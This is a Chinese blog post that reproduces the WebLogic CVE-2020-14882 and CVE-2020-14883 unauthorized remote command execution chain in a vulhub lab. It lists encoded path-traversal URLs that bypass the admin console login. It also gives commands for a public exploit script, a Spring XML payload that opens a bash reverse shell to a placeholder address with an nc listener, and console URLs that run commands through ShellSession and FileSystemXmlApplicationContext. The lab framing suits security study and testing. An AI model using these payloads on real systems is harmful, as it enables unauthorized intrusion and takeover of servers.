Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883

这篇具有很好参考价值的文章主要介绍了Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞名称

Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883

漏洞描述

Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)。

CVE-2020-14882:允许未授权的用户绕过管理控制台的权限验证访问后台

CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令

使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身 份执行命令。

受影响版本

10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

一、环境搭建

Weblogic未授权访问漏洞-CVE-2020-14882

使用vulhub靶场

git clone https://github.com/vulhub/vulhub.git    #vulhuba靶场下载

1.cd vulhub/weblogic/CVE-2020-14882  

2.docker-compose up -d     #启动环境

cve 2020 14883,漏洞复现,安全

cve 2020 14883,漏洞复现,安全

查看是否搭建成功

访问 http://your-IP:7001/console

出现此界面,表示搭建成功

cve 2020 14883,漏洞复现,安全

二、绕过后台登录

权限漏洞绕过,主要的POC如下:

/console/images/%252E%252E%252Fconsole.portal

/console/css/%25%32%65%25%32%65%25%32%66console.portal

大写换成小写可绕过补丁:

/console/css/%252e%252e%252fconsole.portal

绕过后台登录

http://your-ip:7001/console/images/%252E%252E%252Fconsole.portal

cve 2020 14883,漏洞复现,安全

 访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码。

三、脚本利用

脚本地址:  https://github.com/backlion/CVE-2020-14882_ALL

命令回显:  python3 CVE-2020-14882——ALL.py -u http://your-ip:7001/ -c "whoami"

                     python3 CVE-2020-14882——ALL.py -u http://your-ip:7001/ -c "ls"

cve 2020 14883,漏洞复现,安全

cve 2020 14883,漏洞复现,安全

外置xml文件无回显命令执行

Linux反弹shell为例,编辑poc.xml文件

命令:touch  poc.xml

当前目录新建poc.xml

cve 2020 14883,漏洞复现,安全

写入以下代码:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
    <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxx  0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

注意:上面反弹的地址是your-IP地址和任意端口

在当前目录执行以下命令,服务器就在当前目录

python3 -m http.server      #开启新的服务器

cve 2020 14883,漏洞复现,安全cve 2020 14883,漏洞复现,安全

通过脚本执行命令:

python3 CVE-2020-14882_ALL.py -u http://172.16.115.130:7001/ -x http://172.16.115.130:8000/poc.xml

cve 2020 14883,漏洞复现,安全

 打开监听

nc -lvvp 2023

cve 2020 14883,漏洞复现,安全

weblogic远程命令执行(CVE-2020-14883)

CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令

使用CVE-2020-14882  环境复现

这个漏洞一共有两种利用方法:

第一种方法是通过:com.tangosol.coherence.mvel2.sh.ShellSession

执行命令:

http://172.16.115.130:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/abcde');")

cve 2020 14883,漏洞复现,安全

docker  exec -it  容器ID /bin/bash   #查看是否创建成功

cve 2020 14883,漏洞复现,安全

这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在 com.tangosol.coherence.mvel2.sh.ShellSession 类

第二种方法:

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一种更为通杀的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。

#开启一个服务器

python3 -m http.server

cve 2020 14883,漏洞复现,安全

#新建qwe.xml文件,写入以下内容,并保存至刚开启的服务器上
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/zxcvb]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

#然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:

http://172.17.0.1:7001/console/css/%252e%252e%252fconsole.portal?

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://172.16.115.130/qwe.xml")

cve 2020 14883,漏洞复现,安全

进入容器查看是否创建成功:

docker exec -it 容器id /bin/bash

cve 2020 14883,漏洞复现,安全

参考链接:

https://blog.csdn.net/qq_32731075/article/details/117673410

http://luckysec.cn/posts/b52ee26f.html

如有问题,欢迎留言。文章来源地址https://www.toymoban.com/news/detail-560559.html

到了这里,关于Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

    目录 weblogic  漏洞环境准备 漏洞复现 修复建议 WebLogic 是 美国Oracle公司 出品的一个 application server ,确切的说是一个基于 JAVAEE 架构的 中间件 , WebLogic 是用于 开发 、集成、部署和管理大型分布式 Web 应用、 网络应用 和 数据库应用 的 Java应用服务器 。将 Java 的动态功能和

    2024年02月01日
    浏览(34)
  • H2db console 未授权访问RCE 漏洞复现+利用(CVE-2022-23221)

    H2是Thomas Mueller提供的一个开源的、纯java实现的关系数据库。H2的主要特点是:非常快,开源,JDBC API;嵌入式和服务器模式;内存数据库;基于浏览器的控制台应用程序。 H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远

    2024年02月14日
    浏览(30)
  • CVE-2023-21839:Weblogic反序列化漏洞复现

    声明:仅供学习参考使用,请勿用作违法用途,否则后果自负 在进行漏洞复现前简单描述一下什么是序列化和反序列化: 1、序列化和反序列化的定义: (1)Java序列化就是指把Java对象转换为字节序列的过程。 Java反序列化就是指把字节序列恢复为Java对象的过程。 (2)序列化最重

    2024年02月13日
    浏览(30)
  • Weblogic反序列化(CVE-2023-21839)漏洞复现

    序列化(Serialization):将对象的状态信息转换为可以存储或传输的形式的过程,一般将对象转换为字节流。序列化时,对象的当前状态被写入到临时或持久性存储区(文件、内存、数据库等)。 反序列化(Deserialization):从序列化的表示形式中提取数据,即把有序字节流恢

    2024年02月07日
    浏览(32)
  • 中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等 1、中间件-Weblogic安全 2、中间件-JBoos安全 3、中间件-Jenkins安全 4、中间件-GlassFish安全 常见中间件的安全测试: 1、配置

    2024年02月08日
    浏览(28)
  • WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)

    Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。 这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的

    2024年02月06日
    浏览(83)
  • 漏洞复现Tomcat系列弱口令、CVE-2017-12615、CVE-2020-1938

    Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。如果可以利用弱口令进去的,可直接getshell vulhub搭建环境 访问靶场地址,使用tomcat/tomcat弱口令登录后台 制作webshell.war 上传shell.war,访问试一下并用冰蝎连接试一下 成功拿到shell权限 Apache Tomcat 7.0.0版本至7.0.

    2024年02月12日
    浏览(27)
  • CVE-2020-1938 Tomcat文件包含漏洞复现

    Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包

    2024年02月08日
    浏览(38)
  • Docker 容器逃逸漏洞 (CVE-2020-15257)复现

    漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这

    2024年02月10日
    浏览(27)
  • CVE-2020-17518 flink任意文件上传漏洞复现

    Apache Flink 是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 编号:CVE-2020-17518 Flink 1.5.1引入了REST API,但其实现上存在多处

    2024年02月10日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包